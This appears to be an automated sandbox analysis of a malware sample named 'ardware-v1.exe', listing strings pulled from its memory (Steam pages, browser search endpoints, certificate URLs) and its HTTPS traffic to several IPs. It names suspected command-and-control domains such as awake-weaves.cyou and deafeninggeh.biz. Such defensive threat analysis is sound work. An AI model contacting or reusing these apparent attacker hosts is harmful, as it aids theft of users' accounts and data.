Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ardware-v1.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: ardware-v1.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ardware-v1.exe | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: ardware-v1.exe | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: ardware-v1.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: ardware-v1.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: ardware-v1.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com00
                Source: ardware-v1.exeString found in binary or memory: http://ocsps.ssl.com0?
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: ardware-v1.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstnM
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api8
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apiL
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstati
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/puHwl
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/P:
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apie
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz:443/api1
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/pi
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49719 version: TLS 1.2
